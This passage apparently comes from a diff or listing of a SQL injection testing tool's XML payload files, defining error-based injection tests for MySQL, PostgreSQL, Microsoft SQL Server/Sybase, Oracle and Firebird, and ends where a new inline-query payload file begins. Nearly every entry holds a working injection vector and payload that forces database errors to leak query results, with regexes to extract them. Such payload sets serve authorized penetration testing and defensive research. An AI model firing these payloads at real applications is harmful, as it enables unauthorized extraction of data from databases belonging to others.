 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>PostgreSQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>2</where>
 | 
			
		||||
        <vector>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Microsoft SQL Server</dbms>
 | 
			
		||||
            <dbms>Sybase</dbms>
 | 
			
		||||
            <os>Windows</os>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>2</where>
 | 
			
		||||
        <vector>OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Microsoft SQL Server</dbms>
 | 
			
		||||
            <dbms>Sybase</dbms>
 | 
			
		||||
            <os>Windows</os>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Oracle OR error-based - WHERE or HAVING clause (XMLType)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>2</where>
 | 
			
		||||
        <vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Oracle</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>2</where>
 | 
			
		||||
        <vector>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Oracle</dbms>
 | 
			
		||||
            <dbms_version>>= 8.1.6</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>2</where>
 | 
			
		||||
        <vector>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Oracle</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Firebird OR error-based - WHERE or HAVING clause</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>2</where>
 | 
			
		||||
        <vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Firebird</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
    <!--
 | 
			
		||||
         TODO: if possible, add payload for SQLite, Microsoft Access,
 | 
			
		||||
         and SAP MaxDB - no known techniques at this time
 | 
			
		||||
    -->
 | 
			
		||||
    <!-- End of error-based tests - WHERE or HAVING clause -->
 | 
			
		||||
 | 
			
		||||
    <!-- Error-based tests - After ORDER BY...LIMIT... -->
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')),1)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1)</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 5.1</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
    <!-- End of error-based tests - After ORDER BY...LIMIT... -->
 | 
			
		||||
 | 
			
		||||
    <!-- Error-based tests - Parameter replace -->
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 5.0 error-based - Parameter replace</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1,2,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 5.0</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1,2,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 5.1</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1,2,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 5.1</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>5</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1,2,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 5.5</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>PostgreSQL error-based - Parameter replace</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1,2,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>PostgreSQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Microsoft SQL Server/Sybase error-based - Parameter replace</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Microsoft SQL Server</dbms>
 | 
			
		||||
            <dbms>Sybase</dbms>
 | 
			
		||||
            <os>Windows</os>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Microsoft SQL Server</dbms>
 | 
			
		||||
            <dbms>Sybase</dbms>
 | 
			
		||||
            <os>Windows</os>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Oracle error-based - Parameter replace</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Oracle</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Firebird error-based - Parameter replace</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1,3</clause>
 | 
			
		||||
        <where>3</where>
 | 
			
		||||
        <vector>(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Firebird</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
    <!-- End of error-based tests - Parameter replace -->
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
    <!-- Error-based tests - GROUP BY and ORDER BY clauses -->
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>2,3</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 5.0</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>2,3</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 5.1</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>2,3</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 5.1</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 5.5 error-based - GROUP BY and ORDER BY clauses (BIGINT UNSIGNED)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>5</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>2,3</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 5.5</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>2,3</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>PostgreSQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Microsoft SQL Server/Sybase error-based - ORDER BY clause</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>3</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>,(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>,(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Microsoft SQL Server</dbms>
 | 
			
		||||
            <dbms>Sybase</dbms>
 | 
			
		||||
            <os>Windows</os>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Oracle error-based - GROUP BY and ORDER BY clauses</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>2,3</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Oracle</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
    <!--
 | 
			
		||||
         TODO: if possible, add payload for SQLite, Microsoft Access
 | 
			
		||||
         and SAP MaxDB - no known techniques at this time
 | 
			
		||||
    -->
 | 
			
		||||
    <!-- End of error-based tests - GROUP BY and ORDER BY clauses -->
 | 
			
		||||
</root>
 | 
			
		||||
							
								
								
									
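--- a/xml/payloads/03_inline_query.xml
+++ b/xml/payloads/03_inline_query.xml
@@ -0,0 +1,120 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <!-- Inline queries tests -->
+    <test>
+        <title>MySQL inline queries</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+        <request>
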